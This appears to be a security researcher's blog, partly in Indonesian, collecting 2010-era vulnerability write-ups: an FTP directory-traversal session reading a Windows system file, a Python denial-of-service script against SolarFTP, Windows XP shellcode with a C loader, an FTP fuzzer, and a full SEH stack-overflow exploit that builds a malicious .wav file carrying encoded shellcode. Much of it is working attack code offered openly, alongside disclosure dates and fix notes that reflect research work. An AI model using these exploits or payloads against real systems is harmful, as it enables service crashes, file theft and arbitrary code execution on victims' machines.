QuickShare File Server 1.2.1 FTP Directory Traversal Vulnerability

QuickShare File Server is prone to a FTP directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue will allow an attacker to modify files outside the destination directory and possibly gain access to the system.

Software Description

QuickShare File Server is a easy to use file sharing software helps you build your own file server. Users could access your server through web browsers or FTP client softwares (In most case, they need not to install any extra softwares). Users could send or receive large files to or from you. You could create account and set password to protect your files.

Exploit Information

It’s a FTP directory traversal. User without prior permission can get a file outside the specified directory (e.g. get a file from %systemroot%). This vulnerability can be exploited by anonymous or authenticated users.

POC

Below is the proof of concept, authenticated user logged in to the quickshare ftp server from Ubuntu Linux. The highlighted lines contain commands I type to the Quickshare ftp server.

modpr0be@digital-echidna:~$ ftp 10.5.5.27
Connected to 10.5.5.27.
220 quickshare ftpd ready.
Name (10.5.5.27:modpr0be): ftpuser
331 User name okay, need password.
Password: *******
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get ../../../../../../../../boot.ini boot.ini
local: boot.ini remote: ../../../../../../../../boot.ini
200 PORT command successful. Consider using PASV.
150 Opening BINARY connection.
226 File send OK.
211 bytes received in 0.00 secs (127.0 kB/s)
ftp> quit
221 Goodbye.
modpr0be@digital-echidna:~$ cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
modpr0be@digital-echidna:~$

Fix and Update

QuickShare Team fix this vulnerability and update it to version 1.2.2, see here.

FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit

A vulnerability has been discovered in FTPGetter, which can be exploited by malicious people to compromise a user’s system.

The issue is likely due to insufficient bounds checking and presents itself when the affected FTP client makes a connection to a malicious server that is running PASV mode. The PASV command is issued to tell the server that the client wishes to transfer files in passive mode. FTP servers that support passive mode will respond to such a request with an IP address and port number.

Successful exploitation allows execution of arbitrary code, but requires that the user is tricked into connecting to a malicious FTP server.

Software Description

Save time on FTP/SFTP updates! Plan your uploads and automate the workflow. Schedule and automate file transfers with a centralized console. Let your computer move or synchronize information securely between home and office automatically according to the schedule!

Exploit Information

There was an error when sending a response to the PASV command. Unfortunately, these errors lead to buffer overflows. This exploit is unstable. It should only be used as a POC. I tried several times on various systems, the buffer sometimes changed.

Some Conditions to PoC

This POC is using “the most selling feature” Automated FTP Request. So this POC, I use Auto Download with / as the Source Files. Scheduler Settings also set to Repetitive. Make sure to run the program first before this POC.

It’s a part of “Death of an FTP Client” 🙂
For more information, look at here:
http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/

Proof of Concept

http://www.exploit-db.com/exploits/16101/

Fix and Update

Do not connect to untrusted FTP server. Fix or update not available yet, we will update this post if the vendor fix the bug.

UPDATE: FTPGetter team has released new version of FTPGetter, more info on their website

SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability

SolarFTP Server 2.0 is prone to a denial of service condition. It fails to properly sanitize user-supplied input resulting in a denial of service. With a specially crafted ‘USER’, ‘APPE’, ‘GET’, ‘PUT’, and ‘NLST’ command, a remote attacker can potentially disable the FTP service.

Software Description

Solar FTP Server is a handy and easy to use personal FTP server with features like virtual directories, simple and intuitive user interface, real-time activity monitoring and management.

Testing and Fuzzing

Using Very Simple FTP Fuzzer, we test the FTP server with various commands. The first command that we sent was APPE (append). The Windows exception handler pop out. That was verify that the server may be vulnerable to some commands.

Unfortunately, the junk that we sent did not overwrite the SEH nor the EIP. It just end in Denial of Service. In conclusion, there are 4 commands which make the server crash, APPE, NLST, PUT, and GET.

Proof of Concept

Here are the python script for the PoC.

#!/usr/bin/python

# Exploit Title: SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability
# Date: 12/17/2010
# Author: modpr0be
# Software Link: http://www.solarftp.com/files/solarftps-setup.exe
# Vulnerable version: 2.0
# Tested on: Windows XP SP2, Windows XP SP3
# CVE : N/A
#
# ======================================================================
#        ___       _ __        __            __    _     __
#   ____/ (_)___ _(_) /_____ _/ / ___  _____/ /_  (_)___/ /___  ____ _
#  / __  / / __ `/ / __/ __ `/ / / _ / ___/ __ / / __  / __ / __ `/
# / /_/ / / /_/ / / /_/ /_/ / / /  __/ /__/ / / / / /_/ / / / / /_/ /
# __,_/_/__, /_/__/__,_/_/  ___/___/_/ /_/_/__,_/_/ /_/__,_/
#        /____/                          http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
# 	say hello to all digital-echidna org crew:
# 		otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
#	special thx to amalia (^^), oebaj, offsec, exploit-db, corelan team
#
#### Software description:
# Solar FTP Server is a handy and easy to use personal FTP server with
# features like virtual directories, simple and intuitive user interface,
# real-time activity monitoring and management.
#
#### Exploit information:
# SolarFTP 2.0 will suddenly stop (crash) while these commands were sent:
# APPE, GET, PUT, NLST, and MDTM
# Sending USER with junk also crashing the Admin Configuration but not the service.
# Stack contains our junk in random. Both EIP and SEH were not overwritten.
#
#### Other information:
# 12/10/2010 - vendor contacted
# 12/17/2010 - no response, advisory released

import socket, sys
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

junk = "x41" * 80000

def banner():
	print "nSolarFTP 2.0 Multiple Commands Denial of Service Vulnerability."
	print "By: modpr0be (modpr0be[at]digital-echidna[dot]org)n"

if len(sys.argv)!=4:
        banner()
        print "Usage: %s
n" %sys.argv[0]
        sys.exit(0)

try:
	s.connect((sys.argv[1], 21))
except:
	print "Can't connect to server!n"
	sys.exit(0)

s.recv(1024)
s.send('USER '+sys.argv[2]+'rn')
s.recv(1024)
s.send('PASS '+sys.argv[3]+'rn')
s.recv(1024)
s.send('APPE '+junk+'rn')
s.recv(1024)
s.close()

Or you can download at Exploit-DB from the link below:
http://www.exploit-db.com/exploits/15750/

Fix and Update

Download the latest version from SolarFTP website.

53 bytes – Windows XP SP3 (en) notepad.exe win32 Shellcode

Finally, my first win32 shellcode..

This will execute notepad.exe when loaded. Run on Windows XP SP3 English.

/*
(o_Ov) say hello to all digital-echidna org crew:
otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix

special thx to offsec, exploit-db, and corelan team
*/

/*shellcodetest.c*/

char code[] = "\x31\xc0\x50\xb8\x72\x75\x11\x11"
"\x2d\x11\x11\x11\x11\x50\x68\x6f"
"\x74\x65\x70\x68\x2f\x63\x20\x6e"
"\x68\x65\x78\x65\x20\x68\x63\x6d"
"\x64\x2e\x89\xe3\x50\x53\xbb"
"\x0d\x25\x86\x7c"			/*Kernel32.dll.WinExec*/
"\xff\xd3\x50\xbb"
"\x12\xcb\x81\x7c"			/*Kernel32.dll.ExitProcess*/
"\xff\xd3";

int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}

0day Linux Escalation Privilege Exploit Collection (Oct-Nov 2010)

I have created a script that contains of local privilege escalation exploits that was published by Tavis Ormandy via Exploit-DB.com between October – November 2010.

Take a look at here 201011-0day-linux-exploit

*Update 1: I rename the file and make the script more comfort.
*Update 2: Moved to Github

Please note that I am not responsible for the misuse of this tool. I just collect them into one script. For all users who download this tool should have their own responsibility on it.

Very Simple FTP Fuzzer

Written in Python, i try to make a simple fuzzer for FTP server. This script will try to fuzz the commands like APPE, USER, LIST, CWD, etc..you can find all commands here 😉

This script is simply a modified version from muts simple ftp fuzzer during offsec training 😀

Hope you like it 🙂

#!/usr/bin/env python

########################################################
# Very Simple FTP Fuzzer                               #
# this is a modified version from simple ftp fuzzer    #
# coded by muts                                        #
#                                                      #
# thx: oebaj, offsec, xecureit, jasakom, 0x70y #
########################################################

import sys, socket
from optparse import OptionParser

usage = "./%prog -t [target] -p [port] -u [ftp user] -P [ftp passwd] -c [command to fuzz]"
usage += "nContoh: ./%prog -t 192.168.10.10 -p 21 -u ftp -P ftp -c APPE"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string", action="store", dest="port",
		help="Port to connect")
parser.add_option("-t", type="string", action="store", dest="target",
		help="The target server")
parser.add_option("-u", type="string", action="store", dest="username",
		help="FTP username")
parser.add_option("-P", type="string", action="store", dest="password",
		help="FTP password")
parser.add_option("-c", type="string", action="store", dest="fuzz",
		help="Command to Fuzz ")
(options, args) = parser.parse_args()

def banner():
	print "ntt|------------------------------------------------------------------|"
	print "tt|	  	      Very Simple FTP Fuzzer			   |"
	print "tt|------------------------[ by modpr0be ]---------------------------|"
	print "tt|-----------------[ modpr0be[at]postnix[dot]org ]------------------|"
	print "tt|-------------------[ originally coded by muts ]-------------------|"
	print "tt|------------------------------------------------------------------|n"

if len(sys.argv) < 4:
	banner()
	parser.print_help()
	sys.exit(1)

def cmd():
	for string in buffer:
		print "Fuzzing command " + (options.fuzz) + ": " +str(len(string))
		s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		connect=s.connect((options.target, 21))
		s.recv(1024)
		s.send('USER '+(options.username)+'rn')
		s.recv(1024)
		s.send('PASS '+(options.password)+'rn')
		s.recv(1024)
		s.send((options.fuzz) + ' ' + string + 'rn')
		s.recv(1024)
		s.send('byern')
		s.close()

banner()
buffer = ["A"]
counter = 100
while len(buffer) <=100:
	buffer.append("A" * counter)
	counter = counter + 100
cmd()

#20109modpr0be

Batch Audio Converter <=v.1.0.0 Stack Overflow (SEH)

Iseng-iseng nyari aplikasi yang bisa diotak-atik buat maenan SEH, dapet juga aplikasi Batch Audio Converter <= v.0.4.0.0 dan berhasil di eksploitasi dengan sukses melalui SEH Overflow (tulisan mengenai SEH secara jelas bisa dilihat di situs Peter Van Eeckhoutte dan situs underground Indonesia tertua, Kecoak Elektronik). Ngeliat versi dari aplikasinya, saya liat di Help/About pada aplikasi tersebut dan mengunjungi situs pembuatnya. Pembuatnya adalah Freewaretoolbox, langsung aja saya download versi terakhir, yaitu versi 1.0.0 dan ternyata masih kena juga dengan buffer overflow.

Saya langsung kirim email ke pembuatnya untuk segera diperbaiki karena kalau dilihat, aplikasi ini sangat umum dipakai karena beberapa dari pengguna internet sering melakukan konversi dari format mp3 ke format wav atau ke format yang lain.

Secara umum, tehnik eksploitasi ini digolongkan sebagai Local Exploit yang berujung pada Client-side Attack karena membutuhkan pihak ketiga (klien) untuk berhasil mengeksploitasi. Berikut adalah penggalan Proof of Concept (PoC) yang saya lakukan terhadap aplikasi tersebut.

#!/usr/bin/python#
# PoC for the Batch Audio Converter .wav crash
# SEH 41414141
# nSEH 41414141
# EIP 41414141
#
junk = &quot;A&quot; * 5000
f = open(&#039;lagu.wav&#039;, &#039;w&#039;)
f.write(junk)
f.close()

Script diatas akan membuat file lagu.wav yang berisi karakter A sebanyak 5000 bytes, bukalah dengan Batch Audio Converter, maka aplikasi tersebut akan tertutup (baca: crash). Keseluruhan proses eksploitasi membutuhkan pengetahuan tentang basic buffer overflow dan tehnik overflow di SEH. Berikut hasil kode PoC eksploit yang berhasil menjalankan calc.exe.

#!/usr/bin/python

import struct

junk = &quot;A&quot; * 4132
nseh = &quot;\xeb\x06\x90\x90&quot;
seh = struct.pack(&#039;&lt;L&#039;, 0x10029bb7) # pop edi pop esi ret from lame_enc.dll
nop = &quot;\x90&quot; * 30
print &quot;[+] Preparing for file..&quot;
# windows/exec, CMD=calc.exe, EXITFUNC=seh
# 463 bytes, x86/alpha_mixed
shellcode = (&quot;\x89\xe3\xdb\xc6\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a&quot;
&quot;\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41&quot;
&quot;\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42&quot;
&quot;\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49&quot;
&quot;\x6c\x49\x78\x4d\x59\x47\x70\x45\x50\x45\x50\x43\x50\x4c\x49&quot;
&quot;\x48\x65\x45\x61\x4e\x32\x42\x44\x4e\x6b\x50\x52\x44\x70\x4c&quot;
&quot;\x4b\x50\x52\x44\x4c\x4e\x6b\x42\x72\x45\x44\x4c\x4b\x43\x42&quot;
&quot;\x46\x48\x44\x4f\x4d\x67\x51\x5a\x46\x46\x44\x71\x4b\x4f\x44&quot;
&quot;\x71\x49\x50\x4e\x4c\x47\x4c\x51\x71\x51\x6c\x43\x32\x46\x4c&quot;
&quot;\x51\x30\x49\x51\x48\x4f\x46\x6d\x45\x51\x49\x57\x4d\x32\x48&quot;
&quot;\x70\x50\x52\x42\x77\x4c\x4b\x46\x32\x44\x50\x4c\x4b\x43\x72&quot;
&quot;\x47\x4c\x47\x71\x4e\x30\x4c\x4b\x47\x30\x51\x68\x4f\x75\x4f&quot;
&quot;\x30\x42\x54\x42\x6a\x46\x61\x4a\x70\x46\x30\x4c\x4b\x43\x78&quot;
&quot;\x46\x78\x4e\x6b\x43\x68\x47\x50\x45\x51\x4b\x63\x4b\x53\x47&quot;
&quot;\x4c\x47\x39\x4e\x6b\x47\x44\x4e\x6b\x46\x61\x48\x56\x50\x31&quot;
&quot;\x49\x6f\x50\x31\x4f\x30\x4c\x6c\x4b\x71\x4a\x6f\x44\x4d\x46&quot;
&quot;\x61\x48\x47\x46\x58\x4d\x30\x44\x35\x49\x64\x43\x33\x43\x4d&quot;
&quot;\x48\x78\x47\x4b\x51\x6d\x47\x54\x51\x65\x4b\x52\x43\x68\x4e&quot;
&quot;\x6b\x46\x38\x47\x54\x47\x71\x4e\x33\x43\x56\x4e\x6b\x46\x6c&quot;
&quot;\x50\x4b\x4c\x4b\x50\x58\x45\x4c\x46\x61\x4b\x63\x4e\x6b\x47&quot;
&quot;\x74\x4c\x4b\x43\x31\x4a\x70\x4c\x49\x42\x64\x44\x64\x46\x44&quot;
&quot;\x51\x4b\x51\x4b\x43\x51\x46\x39\x50\x5a\x42\x71\x4b\x4f\x4b&quot;
&quot;\x50\x46\x38\x51\x4f\x50\x5a\x4e\x6b\x45\x42\x48\x6b\x4c\x46&quot;
&quot;\x51\x4d\x51\x7a\x46\x61\x4c\x4d\x4f\x75\x4f\x49\x47\x70\x43&quot;
&quot;\x30\x43\x30\x46\x30\x42\x48\x50\x31\x4e\x6b\x50\x6f\x4d\x57&quot;
&quot;\x49\x6f\x4b\x65\x4f\x4b\x4b\x4e\x46\x6e\x50\x32\x49\x7a\x43&quot;
&quot;\x58\x4c\x66\x4f\x65\x4f\x4d\x4f\x6d\x4b\x4f\x48\x55\x47\x4c&quot;
&quot;\x47\x76\x51\x6c\x45\x5a\x4d\x50\x4b\x4b\x4d\x30\x44\x35\x43&quot;
&quot;\x35\x4d\x6b\x47\x37\x45\x43\x42\x52\x50\x6f\x51\x7a\x45\x50&quot;
&quot;\x51\x43\x49\x6f\x4b\x65\x43\x53\x45\x31\x42\x4c\x43\x53\x46&quot;
&quot;\x4e\x45\x35\x51\x68\x42\x45\x43\x30\x45\x5a\x41\x41&quot;)

f = open(&#039;exploit.wav&#039;, &#039;w&#039;)
print &quot;[+] Writing vulnerable WAV file..&quot;
f.write(junk+nseh+seh+nop+shellcode)
f.close()
print &quot;[+] Success writing file..&quot;

EDB-ID: 13909
CVE: 2010-2348
OSVDB-ID: 65639
Published: 2010-06-17
Mungkin kapan-kapan kalau saya sempat saya tuliskan bagaimana proses pembuatannya, sekalian nanti (lagi-lagi kalau sempat) juga buat cara konversi ke Metasploit, cara fuzzing, exploit dengan kondisi direct RET, abusing SEH and gain EIP, dan bypass ASLR dan DEP di Windows versi terbaru.

Spesial thank’s to..

Oebaj – thx Pak, saya ga mungkin jadi “gini” kalo ga disuruh ngambil offsec 😉
Otoy – dapat juga lo bro, mantab!
Kilurah – kapan lanjutin lagi woy?!
slashr00t – semangat kawan2!